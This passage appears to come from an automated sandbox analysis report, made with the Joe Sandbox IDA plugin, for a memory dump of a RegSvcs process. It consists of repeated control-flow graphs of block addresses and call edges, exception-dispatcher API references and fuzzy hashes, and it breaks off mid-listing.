6268012-62680ea 2003 62680ea call 6905798 1903->2003 2004 62680ea call 69057f8 1903->2004 1912 62680f0-626817e 1936 626817e call 6905bf0 1912->1936 1937 626817e call 6905b92 1912->1937 1918 6268184-62681d5 1921->1799 1922->1799 1923->1799 1924->1799 1925->1799 1926->1799 1927->1876 1928->1876 1929->1876 1930->1837 1931->1837 1932->1837 1933->1837 1934->1840 1935->1840 1936->1918 1937->1918 1938->1805 1939->1805 1940->1805 1941->1805 1942->1805 1943->1805 1944->1882 1945->1882 1946->1843 1947->1843 1948->1843 1949->1846 1950->1846 1951->1808 1952->1808 1953->1808 1954->1808 1955->1888 1956->1888 1957->1852 1958->1852 1959->1852 1960->1813 1961->1813 1962->1813 1964->1816 1965->1816 1966->1894 1967->1894 1968->1894 1969->1855 1970->1855 1971->1855 1972->1855 1973->1858 1974->1858 1975->1858 1976->1819 1977->1819 1978->1819 1979->1897 1980->1897 1981->1822 1982->1822 1984->1784 1985->1784 1986->1784 1987->1784 1988->1784 1989->1861 1990->1861 1991->1861 1992->1861 1993->1903 1994->1903 1995->1793 1996->1793 1997->1793 1998->1793 1999->1793 2000->1793 2001->1831 2002->1831 2003->1912 2004->1912 2005->1796 2006->1796 2007->1796 2008->1873 2009->1873 2010->1873 2011->1873 2012->1873
                                                                                                    APIs
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267763
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267992
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521289102.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6260000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 6842923-0
                                                                                                    • Opcode ID: 4a156094c2b0d4bbcbf2614c94876c20f0588648f7a54b8936d2db9876d930d1
                                                                                                    • Instruction ID: 681d1ddb4a1f6cdfbd65f59eb63aecc31936d28c4b0eb9b58e8ee77686d178c4
                                                                                                    • Opcode Fuzzy Hash: 4a156094c2b0d4bbcbf2614c94876c20f0588648f7a54b8936d2db9876d930d1
                                                                                                    • Instruction Fuzzy Hash: E102C734911368CFDBA5DF30E88C699B7B6BF4931AF1041E9D90A56340DB399E81CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 2013 626753f-62675d6 2220 62675d6 call 626fb43 2013->2220 2221 62675d6 call 626f5d0 2013->2221 2222 62675d6 call 626fc48 2013->2222 2223 62675d6 call 626fb98 2013->2223 2224 62675d6 call 626f978 2013->2224 2225 62675d6 call 626f5b9 2013->2225 2023 62675dc-6267613 2230 6267613 call 6970006 2023->2230 2231 6267613 call 6970371 2023->2231 2232 6267613 call 6970040 2023->2232 2026 6267619-6267650 2151 6267650 call 6971165 2026->2151 2152 6267650 call 6970998 2026->2152 2153 6267650 call 69709a8 2026->2153 2154 6267650 call 6971558 2026->2154 2155 6267650 call 69710b8 2026->2155 2156 6267650 call 69710a8 2026->2156 2029 6267656-62676d5 2168 62676d5 call 6971d27 2029->2168 2169 62676d5 call 6971e27 2029->2169 2170 62676d5 call 6971bd0 2029->2170 2171 62676d5 call 6971bc0 2029->2171 2172 62676d5 call 6971d69 2029->2172 2173 62676d5 call 6971dc8 2029->2173 2035 62676db-626771c 2181 626771c call 6971f47 2035->2181 2182 626771c call 6971e88 2035->2182 2183 626771c call 6971ee8 2035->2183 2184 626771c call 6971fa8 2035->2184 2038 6267722-62677aa KiUserExceptionDispatcher 2190 62677aa call 69722f7 2038->2190 2191 62677aa call 69723b7 2038->2191 2192 62677aa call 6972358 2038->2192 2043 62677b0-62677f1 2194 62677f1 call 6972418 2043->2194 2195 62677f1 call 6972478 2043->2195 2046 62677f7-6267838 2206 6267838 call 6972cc0 2046->2206 2207 6267838 call 6972b70 2046->2207 2208 6267838 call 6972d1f 2046->2208 2049 626783e-626787f 2211 626787f call 6972d80 2049->2211 2212 626787f call 6972de0 2049->2212 2052 6267885-626794b 2226 626794b call 6974c68 2052->2226 2227 626794b call 6974b18 2052->2227 2061 6267951-62679ef KiUserExceptionDispatcher 2160 62679ef call 6976823 2061->2160 2161 62679ef call 6976760 2061->2161 2162 62679ef call 69766af 2061->2162 2163 62679ef call 69767bf 2061->2163 2067 62679f5-6267a36 2164 6267a36 call 6976823 2067->2164 2165 6267a36 call 6976880 2067->2165 2070 6267a3c-6267a7d 2176 6267a7d call 6977183 2070->2176 2177 6267a7d call 6976d18 2070->2177 2178 6267a7d call 6976bc8 2070->2178 2073 6267a83-6267ac4 2179 6267ac4 call 6978671 2073->2179 2180 6267ac4 call 6978680 2073->2180 2076 6267aca-6267b52 2187 6267b52 call 6978e21 2076->2187 2188 6267b52 call 6978e80 2076->2188 2189 6267b52 call 6978edf 2076->2189 2082 6267b58-6267b9c 2199 6267b9c call 6978fa0 2082->2199 2200 6267b9c call 6978f40 2082->2200 2201 6267b9c call 697928c 2082->2201 2202 6267b9c call 6979238 2082->2202 2085 6267ba2-6267bda 2203 6267bda call 697f917 2085->2203 2204 6267bda call 697f310 2085->2204 2205 6267bda call 697f320 2085->2205 2088 6267be0-6267c24 2214 6267c24 call 697fa37 2088->2214 2215 6267c24 call 697f9d4 2088->2215 2216 6267c24 call 697f989 2088->2216 2217 6267c24 call 697f9d8 2088->2217 2091 6267c2a-6267d4c 2233 6267d4c call 6900ab0 2091->2233 2234 6267d4c call 6900b60 2091->2234 2235 6267d4c call 6900e92 2091->2235 2236 6267d4c call 6900f28 2091->2236 2237 6267d4c call 6900eba 2091->2237 2103 6267d52-6267d8a 2157 6267d8a call 6901060 2103->2157 2158 6267d8a call 6900fff 2103->2158 2159 6267d8a call 69010bf 2103->2159 2106 6267d90-6267e12 2174 6267e12 call 6901180 2106->2174 2175 6267e12 call 6901120 2106->2175 2112 6267e18-6267e9a 2185 6267e9a call 6901ec8 2112->2185 2186 6267e9a call 6901dc8 2112->2186 2118 6267ea0-6267f2e call 69022e8 2196 6267f2e call 6902f00 2118->2196 2197 6267f2e call 69030e0 2118->2197 2198 6267f2e call 690313f 2118->2198 2124 6267f34-6267f78 2209 6267f78 call 6903200 2124->2209 2210 6267f78 call 69031a0 2124->2210 2127 6267f7e-626800c call 690479a 2218 626800c call 69049b0 2127->2218 2219 626800c call 69047c2 2127->2219 2133 6268012-62680ea 2228 62680ea call 6905798 2133->2228 2229 62680ea call 69057f8 2133->2229 2142 62680f0-626817e 2166 626817e call 6905bf0 2142->2166 2167 626817e call 6905b92 2142->2167 2148 6268184-62681d5 2151->2029 2152->2029 2153->2029 2154->2029 2155->2029 2156->2029 2157->2106 2158->2106 2159->2106 2160->2067 2161->2067 2162->2067 2163->2067 2164->2070 2165->2070 2166->2148 2167->2148 2168->2035 2169->2035 2170->2035 2171->2035 2172->2035 2173->2035 2174->2112 2175->2112 2176->2073 2177->2073 2178->2073 2179->2076 2180->2076 2181->2038 2182->2038 2183->2038 2184->2038 2185->2118 2186->2118 2187->2082 2188->2082 2189->2082 2190->2043 2191->2043 2192->2043 2194->2046 2195->2046 2196->2124 2197->2124 2198->2124 2199->2085 2200->2085 2201->2085 2202->2085 2203->2088 2204->2088 2205->2088 2206->2049 2207->2049 2208->2049 2209->2127 2210->2127 2211->2052 2212->2052 2214->2091 2215->2091 2216->2091 2217->2091 2218->2133 2219->2133 2220->2023 2221->2023 2222->2023 2223->2023 2224->2023 2225->2023 2226->2061 2227->2061 2228->2142 2229->2142 2230->2026 2231->2026 2232->2026 2233->2103 2234->2103 2235->2103 2236->2103 2237->2103
                                                                                                    APIs
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267763
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267992
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521289102.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6260000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 6842923-0
                                                                                                    • Opcode ID: 5cb717762a40eb30c900b72465868a29e992054d8ca4efd1ab042147354ad805
                                                                                                    • Instruction ID: 13f133a30c4718ffb303aa35d0bfe201133c7d3d39918afe34daecf554a85cc4
                                                                                                    • Opcode Fuzzy Hash: 5cb717762a40eb30c900b72465868a29e992054d8ca4efd1ab042147354ad805
                                                                                                    • Instruction Fuzzy Hash: A802B734911368CFDB65DF30E88C699B7B6BF4931AF1041E9D90A66340DB399E81CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 2238 626757c-62675d6 2375 62675d6 call 626fb43 2238->2375 2376 62675d6 call 626f5d0 2238->2376 2377 62675d6 call 626fc48 2238->2377 2378 62675d6 call 626fb98 2238->2378 2379 62675d6 call 626f978 2238->2379 2380 62675d6 call 626f5b9 2238->2380 2245 62675dc-6267613 2385 6267613 call 6970006 2245->2385 2386 6267613 call 6970371 2245->2386 2387 6267613 call 6970040 2245->2387 2248 6267619-6267650 2393 6267650 call 6971165 2248->2393 2394 6267650 call 6970998 2248->2394 2395 6267650 call 69709a8 2248->2395 2396 6267650 call 6971558 2248->2396 2397 6267650 call 69710b8 2248->2397 2398 6267650 call 69710a8 2248->2398 2251 6267656-62676d5 2410 62676d5 call 6971d27 2251->2410 2411 62676d5 call 6971e27 2251->2411 2412 62676d5 call 6971bd0 2251->2412 2413 62676d5 call 6971bc0 2251->2413 2414 62676d5 call 6971d69 2251->2414 2415 62676d5 call 6971dc8 2251->2415 2257 62676db-626771c 2423 626771c call 6971f47 2257->2423 2424 626771c call 6971e88 2257->2424 2425 626771c call 6971ee8 2257->2425 2426 626771c call 6971fa8 2257->2426 2260 6267722-62677aa KiUserExceptionDispatcher 2432 62677aa call 69722f7 2260->2432 2433 62677aa call 69723b7 2260->2433 2434 62677aa call 6972358 2260->2434 2265 62677b0-62677f1 2436 62677f1 call 6972418 2265->2436 2437 62677f1 call 6972478 2265->2437 2268 62677f7-6267838 2448 6267838 call 6972cc0 2268->2448 2449 6267838 call 6972b70 2268->2449 2450 6267838 call 6972d1f 2268->2450 2271 626783e-626787f 2453 626787f call 6972d80 2271->2453 2454 626787f call 6972de0 2271->2454 2274 6267885-626794b 2381 626794b call 6974c68 2274->2381 2382 626794b call 6974b18 2274->2382 2283 6267951-62679ef KiUserExceptionDispatcher 2402 62679ef call 6976823 2283->2402 2403 62679ef call 6976760 2283->2403 2404 62679ef call 69766af 2283->2404 2405 62679ef call 69767bf 2283->2405 2289 62679f5-6267a36 2406 6267a36 call 6976823 2289->2406 2407 6267a36 call 6976880 2289->2407 2292 6267a3c-6267a7d 2418 6267a7d call 6977183 2292->2418 2419 6267a7d call 6976d18 2292->2419 2420 6267a7d call 6976bc8 2292->2420 2295 6267a83-6267ac4 2421 6267ac4 call 6978671 2295->2421 2422 6267ac4 call 6978680 2295->2422 2298 6267aca-6267b52 2429 6267b52 call 6978e21 2298->2429 2430 6267b52 call 6978e80 2298->2430 2431 6267b52 call 6978edf 2298->2431 2304 6267b58-6267b9c 2441 6267b9c call 6978fa0 2304->2441 2442 6267b9c call 6978f40 2304->2442 2443 6267b9c call 697928c 2304->2443 2444 6267b9c call 6979238 2304->2444 2307 6267ba2-6267bda 2445 6267bda call 697f917 2307->2445 2446 6267bda call 697f310 2307->2446 2447 6267bda call 697f320 2307->2447 2310 6267be0-6267c24 2456 6267c24 call 697fa37 2310->2456 2457 6267c24 call 697f9d4 2310->2457 2458 6267c24 call 697f989 2310->2458 2459 6267c24 call 697f9d8 2310->2459 2313 6267c2a-6267d4c 2388 6267d4c call 6900ab0 2313->2388 2389 6267d4c call 6900b60 2313->2389 2390 6267d4c call 6900e92 2313->2390 2391 6267d4c call 6900f28 2313->2391 2392 6267d4c call 6900eba 2313->2392 2325 6267d52-6267d8a 2399 6267d8a call 6901060 2325->2399 2400 6267d8a call 6900fff 2325->2400 2401 6267d8a call 69010bf 2325->2401 2328 6267d90-6267e12 2416 6267e12 call 6901180 2328->2416 2417 6267e12 call 6901120 2328->2417 2334 6267e18-6267e9a 2427 6267e9a call 6901ec8 2334->2427 2428 6267e9a call 6901dc8 2334->2428 2340 6267ea0-6267f2e call 69022e8 2438 6267f2e call 6902f00 2340->2438 2439 6267f2e call 69030e0 2340->2439 2440 6267f2e call 690313f 2340->2440 2346 6267f34-6267f78 2451 6267f78 call 6903200 2346->2451 2452 6267f78 call 69031a0 2346->2452 2349 6267f7e-626800c call 690479a 2373 626800c call 69049b0 2349->2373 2374 626800c call 69047c2 2349->2374 2355 6268012-62680ea 2383 62680ea call 6905798 2355->2383 2384 62680ea call 69057f8 2355->2384 2364 62680f0-626817e 2408 626817e call 6905bf0 2364->2408 2409 626817e call 6905b92 2364->2409 2370 6268184-62681d5 2373->2355 2374->2355 2375->2245 2376->2245 2377->2245 2378->2245 2379->2245 2380->2245 2381->2283 2382->2283 2383->2364 2384->2364 2385->2248 2386->2248 2387->2248 2388->2325 2389->2325 2390->2325 2391->2325 2392->2325 2393->2251 2394->2251 2395->2251 2396->2251 2397->2251 2398->2251 2399->2328 2400->2328 2401->2328 2402->2289 2403->2289 2404->2289 2405->2289 2406->2292 2407->2292 2408->2370 2409->2370 2410->2257 2411->2257 2412->2257 2413->2257 2414->2257 2415->2257 2416->2334 2417->2334 2418->2295 2419->2295 2420->2295 2421->2298 2422->2298 2423->2260 2424->2260 2425->2260 2426->2260 2427->2340 2428->2340 2429->2304 2430->2304 2431->2304 2432->2265 2433->2265 2434->2265 2436->2268 2437->2268 2438->2346 2439->2346 2440->2346 2441->2307 2442->2307 2443->2307 2444->2307 2445->2310 2446->2310 2447->2310 2448->2271 2449->2271 2450->2271 2451->2349 2452->2349 2453->2274 2454->2274 2456->2313 2457->2313 2458->2313 2459->2313
                                                                                                    APIs
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267763
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267992
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521289102.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6260000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 6842923-0
                                                                                                    • Opcode ID: 3e706cce6b9f6163c610b6f28d9fa2c2df2b74b2da3dae2f170a6d8dea7a70dd
                                                                                                    • Instruction ID: a388fb420a054e0c72ea7463d90723166b72a75cb63dc52b4c9f13948c8c6cae
                                                                                                    • Opcode Fuzzy Hash: 3e706cce6b9f6163c610b6f28d9fa2c2df2b74b2da3dae2f170a6d8dea7a70dd
                                                                                                    • Instruction Fuzzy Hash: 33F1C734911368CFDB65DF30E88C699B7B6BF4931AF1041E9D90A66340DB395E81CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 2460 62675b0-62675d6 2619 62675d6 call 626fb43 2460->2619 2620 62675d6 call 626f5d0 2460->2620 2621 62675d6 call 626fc48 2460->2621 2622 62675d6 call 626fb98 2460->2622 2623 62675d6 call 626f978 2460->2623 2624 62675d6 call 626f5b9 2460->2624 2464 62675dc-6267613 2629 6267613 call 6970006 2464->2629 2630 6267613 call 6970371 2464->2630 2631 6267613 call 6970040 2464->2631 2467 6267619-6267650 2637 6267650 call 6971165 2467->2637 2638 6267650 call 6970998 2467->2638 2639 6267650 call 69709a8 2467->2639 2640 6267650 call 6971558 2467->2640 2641 6267650 call 69710b8 2467->2641 2642 6267650 call 69710a8 2467->2642 2470 6267656-62676d5 2654 62676d5 call 6971d27 2470->2654 2655 62676d5 call 6971e27 2470->2655 2656 62676d5 call 6971bd0 2470->2656 2657 62676d5 call 6971bc0 2470->2657 2658 62676d5 call 6971d69 2470->2658 2659 62676d5 call 6971dc8 2470->2659 2476 62676db-626771c 2667 626771c call 6971f47 2476->2667 2668 626771c call 6971e88 2476->2668 2669 626771c call 6971ee8 2476->2669 2670 626771c call 6971fa8 2476->2670 2479 6267722-62677aa KiUserExceptionDispatcher 2676 62677aa call 69722f7 2479->2676 2677 62677aa call 69723b7 2479->2677 2678 62677aa call 6972358 2479->2678 2484 62677b0-62677f1 2593 62677f1 call 6972418 2484->2593 2594 62677f1 call 6972478 2484->2594 2487 62677f7-6267838 2605 6267838 call 6972cc0 2487->2605 2606 6267838 call 6972b70 2487->2606 2607 6267838 call 6972d1f 2487->2607 2490 626783e-626787f 2610 626787f call 6972d80 2490->2610 2611 626787f call 6972de0 2490->2611 2493 6267885-626794b 2625 626794b call 6974c68 2493->2625 2626 626794b call 6974b18 2493->2626 2502 6267951-62679ef KiUserExceptionDispatcher 2646 62679ef call 6976823 2502->2646 2647 62679ef call 6976760 2502->2647 2648 62679ef call 69766af 2502->2648 2649 62679ef call 69767bf 2502->2649 2508 62679f5-6267a36 2650 6267a36 call 6976823 2508->2650 2651 6267a36 call 6976880 2508->2651 2511 6267a3c-6267a7d 2662 6267a7d call 6977183 2511->2662 2663 6267a7d call 6976d18 2511->2663 2664 6267a7d call 6976bc8 2511->2664 2514 6267a83-6267ac4 2665 6267ac4 call 6978671 2514->2665 2666 6267ac4 call 6978680 2514->2666 2517 6267aca-6267b52 2673 6267b52 call 6978e21 2517->2673 2674 6267b52 call 6978e80 2517->2674 2675 6267b52 call 6978edf 2517->2675 2523 6267b58-6267b9c 2598 6267b9c call 6978fa0 2523->2598 2599 6267b9c call 6978f40 2523->2599 2600 6267b9c call 697928c 2523->2600 2601 6267b9c call 6979238 2523->2601 2526 6267ba2-6267bda 2602 6267bda call 697f917 2526->2602 2603 6267bda call 697f310 2526->2603 2604 6267bda call 697f320 2526->2604 2529 6267be0-6267c24 2613 6267c24 call 697fa37 2529->2613 2614 6267c24 call 697f9d4 2529->2614 2615 6267c24 call 697f989 2529->2615 2616 6267c24 call 697f9d8 2529->2616 2532 6267c2a-6267d4c 2632 6267d4c call 6900ab0 2532->2632 2633 6267d4c call 6900b60 2532->2633 2634 6267d4c call 6900e92 2532->2634 2635 6267d4c call 6900f28 2532->2635 2636 6267d4c call 6900eba 2532->2636 2544 6267d52-6267d8a 2643 6267d8a call 6901060 2544->2643 2644 6267d8a call 6900fff 2544->2644 2645 6267d8a call 69010bf 2544->2645 2547 6267d90-6267e12 2660 6267e12 call 6901180 2547->2660 2661 6267e12 call 6901120 2547->2661 2553 6267e18-6267e9a 2671 6267e9a call 6901ec8 2553->2671 2672 6267e9a call 6901dc8 2553->2672 2559 6267ea0-6267f2e call 69022e8 2595 6267f2e call 6902f00 2559->2595 2596 6267f2e call 69030e0 2559->2596 2597 6267f2e call 690313f 2559->2597 2565 6267f34-6267f78 2608 6267f78 call 6903200 2565->2608 2609 6267f78 call 69031a0 2565->2609 2568 6267f7e-626800c call 690479a 2617 626800c call 69049b0 2568->2617 2618 626800c call 69047c2 2568->2618 2574 6268012-62680ea 2627 62680ea call 6905798 2574->2627 2628 62680ea call 69057f8 2574->2628 2583 62680f0-626817e 2652 626817e call 6905bf0 2583->2652 2653 626817e call 6905b92 2583->2653 2589 6268184-62681d5 2593->2487 2594->2487 2595->2565 2596->2565 2597->2565 2598->2526 2599->2526 2600->2526 2601->2526 2602->2529 2603->2529 2604->2529 2605->2490 2606->2490 2607->2490 2608->2568 2609->2568 2610->2493 2611->2493 2613->2532 2614->2532 2615->2532 2616->2532 2617->2574 2618->2574 2619->2464 2620->2464 2621->2464 2622->2464 2623->2464 2624->2464 2625->2502 2626->2502 2627->2583 2628->2583 2629->2467 2630->2467 2631->2467 2632->2544 2633->2544 2634->2544 2635->2544 2636->2544 2637->2470 2638->2470 2639->2470 2640->2470 2641->2470 2642->2470 2643->2547 2644->2547 2645->2547 2646->2508 2647->2508 2648->2508 2649->2508 2650->2511 2651->2511 2652->2589 2653->2589 2654->2476 2655->2476 2656->2476 2657->2476 2658->2476 2659->2476 2660->2553 2661->2553 2662->2514 2663->2514 2664->2514 2665->2517 2666->2517 2667->2479 2668->2479 2669->2479 2670->2479 2671->2559 2672->2559 2673->2523 2674->2523 2675->2523 2676->2484 2677->2484 2678->2484
                                                                                                    APIs
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267763
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267992
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521289102.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6260000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 6842923-0
                                                                                                    • Opcode ID: 76a964582f9656773a7d54ecbaeffeda98528bbd1e42b7df6aa67e7171a70a3d
                                                                                                    • Instruction ID: db86249b006874711fdc9cc3aae68475eebc2d39a66b7a416bbf0cc561c207a8
                                                                                                    • Opcode Fuzzy Hash: 76a964582f9656773a7d54ecbaeffeda98528bbd1e42b7df6aa67e7171a70a3d
                                                                                                    • Instruction Fuzzy Hash: 4BF1B734911368CFDB65DF30E88C699B7B6BF4931AF1041E9D90A66340DB399E81CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 2679 62675ed-6267613 2866 6267613 call 6970006 2679->2866 2867 6267613 call 6970371 2679->2867 2868 6267613 call 6970040 2679->2868 2683 6267619-6267650 2874 6267650 call 6971165 2683->2874 2875 6267650 call 6970998 2683->2875 2876 6267650 call 69709a8 2683->2876 2877 6267650 call 6971558 2683->2877 2878 6267650 call 69710b8 2683->2878 2879 6267650 call 69710a8 2683->2879 2686 6267656-62676d5 2810 62676d5 call 6971d27 2686->2810 2811 62676d5 call 6971e27 2686->2811 2812 62676d5 call 6971bd0 2686->2812 2813 62676d5 call 6971bc0 2686->2813 2814 62676d5 call 6971d69 2686->2814 2815 62676d5 call 6971dc8 2686->2815 2692 62676db-626771c 2823 626771c call 6971f47 2692->2823 2824 626771c call 6971e88 2692->2824 2825 626771c call 6971ee8 2692->2825 2826 626771c call 6971fa8 2692->2826 2695 6267722-62677aa KiUserExceptionDispatcher 2832 62677aa call 69722f7 2695->2832 2833 62677aa call 69723b7 2695->2833 2834 62677aa call 6972358 2695->2834 2700 62677b0-62677f1 2836 62677f1 call 6972418 2700->2836 2837 62677f1 call 6972478 2700->2837 2703 62677f7-6267838 2848 6267838 call 6972cc0 2703->2848 2849 6267838 call 6972b70 2703->2849 2850 6267838 call 6972d1f 2703->2850 2706 626783e-626787f 2853 626787f call 6972d80 2706->2853 2854 626787f call 6972de0 2706->2854 2709 6267885-626794b 2862 626794b call 6974c68 2709->2862 2863 626794b call 6974b18 2709->2863 2718 6267951-62679ef KiUserExceptionDispatcher 2883 62679ef call 6976823 2718->2883 2884 62679ef call 6976760 2718->2884 2885 62679ef call 69766af 2718->2885 2886 62679ef call 69767bf 2718->2886 2724 62679f5-6267a36 2887 6267a36 call 6976823 2724->2887 2888 6267a36 call 6976880 2724->2888 2727 6267a3c-6267a7d 2818 6267a7d call 6977183 2727->2818 2819 6267a7d call 6976d18 2727->2819 2820 6267a7d call 6976bc8 2727->2820 2730 6267a83-6267ac4 2821 6267ac4 call 6978671 2730->2821 2822 6267ac4 call 6978680 2730->2822 2733 6267aca-6267b52 2829 6267b52 call 6978e21 2733->2829 2830 6267b52 call 6978e80 2733->2830 2831 6267b52 call 6978edf 2733->2831 2739 6267b58-6267b9c 2841 6267b9c call 6978fa0 2739->2841 2842 6267b9c call 6978f40 2739->2842 2843 6267b9c call 697928c 2739->2843 2844 6267b9c call 6979238 2739->2844 2742 6267ba2-6267bda 2845 6267bda call 697f917 2742->2845 2846 6267bda call 697f310 2742->2846 2847 6267bda call 697f320 2742->2847 2745 6267be0-6267c24 2856 6267c24 call 697fa37 2745->2856 2857 6267c24 call 697f9d4 2745->2857 2858 6267c24 call 697f989 2745->2858 2859 6267c24 call 697f9d8 2745->2859 2748 6267c2a-6267d4c 2869 6267d4c call 6900ab0 2748->2869 2870 6267d4c call 6900b60 2748->2870 2871 6267d4c call 6900e92 2748->2871 2872 6267d4c call 6900f28 2748->2872 2873 6267d4c call 6900eba 2748->2873 2760 6267d52-6267d8a 2880 6267d8a call 6901060 2760->2880 2881 6267d8a call 6900fff 2760->2881 2882 6267d8a call 69010bf 2760->2882 2763 6267d90-6267e12 2816 6267e12 call 6901180 2763->2816 2817 6267e12 call 6901120 2763->2817 2769 6267e18-6267e9a 2827 6267e9a call 6901ec8 2769->2827 2828 6267e9a call 6901dc8 2769->2828 2775 6267ea0-6267f2e call 69022e8 2838 6267f2e call 6902f00 2775->2838 2839 6267f2e call 69030e0 2775->2839 2840 6267f2e call 690313f 2775->2840 2781 6267f34-6267f78 2851 6267f78 call 6903200 2781->2851 2852 6267f78 call 69031a0 2781->2852 2784 6267f7e-626800c call 690479a 2860 626800c call 69049b0 2784->2860 2861 626800c call 69047c2 2784->2861 2790 6268012-62680ea 2864 62680ea call 6905798 2790->2864 2865 62680ea call 69057f8 2790->2865 2799 62680f0-626817e 2808 626817e call 6905bf0 2799->2808 2809 626817e call 6905b92 2799->2809 2805 6268184-62681d5 2808->2805 2809->2805 2810->2692 2811->2692 2812->2692 2813->2692 2814->2692 2815->2692 2816->2769 2817->2769 2818->2730 2819->2730 2820->2730 2821->2733 2822->2733 2823->2695 2824->2695 2825->2695 2826->2695 2827->2775 2828->2775 2829->2739 2830->2739 2831->2739 2832->2700 2833->2700 2834->2700 2836->2703 2837->2703 2838->2781 2839->2781 2840->2781 2841->2742 2842->2742 2843->2742 2844->2742 2845->2745 2846->2745 2847->2745 2848->2706 2849->2706 2850->2706 2851->2784 2852->2784 2853->2709 2854->2709 2856->2748 2857->2748 2858->2748 2859->2748 2860->2790 2861->2790 2862->2718 2863->2718 2864->2799 2865->2799 2866->2683 2867->2683 2868->2683 2869->2760 2870->2760 2871->2760 2872->2760 2873->2760 2874->2686 2875->2686 2876->2686 2877->2686 2878->2686 2879->2686 2880->2763 2881->2763 2882->2763 2883->2724 2884->2724 2885->2724 2886->2724 2887->2727 2888->2727
                                                                                                    APIs
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267763
                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 06267992
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.521289102.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_6260000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 6842923-0
                                                                                                    • Opcode ID: 129310281488ce1d8476a423768da98829054f512d3cde359fc7a2806853c6b2
                                                                                                    • Instruction ID: 7ab0027b41cb079158ac35cef3a8f730545c2d9a7d03d459f3fe491aa93ad244
                                                                                                    • Opcode Fuzzy Hash: 129310281488ce1d8476a423768da98829054f512d3cde359fc7a2806853c6b2
                                                                                                    • Instruction Fuzzy Hash: E1F1B634911368CFDBA5DF30E88C699B7B6BF4931AF1041D9D90A66340DB399E81CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 2889 626762a-6267650 3063 6267650 call 6971165 2889->3063 3064 6267650 call 6970998 2889->3064 3065 6267650 call 69709a8 2889->3065 3066 6267650 call 6971558 2889->3066 3067 6267650 call 69710b8 2889->3067 3068 6267650 call 69710a8 2889->3068 2893 6267656-62676d5 3080 62676d5 call 6971d27 2893->3080 3081 62676d5 call 6971e27 2893->3081 3082 62676d5 call 6971bd0 2893->3082 3083 62676d5 call 6971bc0 2893->3083 3084 62676d5 call 6971d69 2893->3084 3085 62676d5 call 6971dc8 2893->3085 2899 62676db-626771c 3015 626771c call 6971f47 2899->3015 3016 626771c call 6971e88 2899->3016 3017 626771c call 6971ee8 2899->3017 3018 626771c call 6971fa8 2899->3018 2902 6267722-62677aa KiUserExceptionDispatcher 3024 62677aa call 69722f7 2902->3024 3025 62677aa call 69723b7 2902->3025 3026 62677aa call 6972358 2902->3026 2907 62677b0-62677f1 3028 62677f1 call 6972418 2907->3028 3029 62677f1 call 6972478 2907->3029 2910 62677f7-6267838 3040 6267838 call 6972cc0 2910->3040 3041 6267838 call 6972b70 2910->3041 3042 6267838 call 6972d1f 2910->3042 2913 626783e-626787f 3045 626787f call 6972d80 2913->3045 3046 626787f call 6972de0 2913->3046 2916 6267885-626794b 3054 626794b call 6974c68 2916->3054 3055 626794b call 6974b18 2916->3055 2925 6267951-62679ef KiUserExceptionDispatcher 3072 62679ef call 6976823 2925->3072 3073 62679ef call 6976760 2925->3073 3074 62679ef call 69766af 2925->3074 3075 62679ef call 69767bf 2925->3075 2931 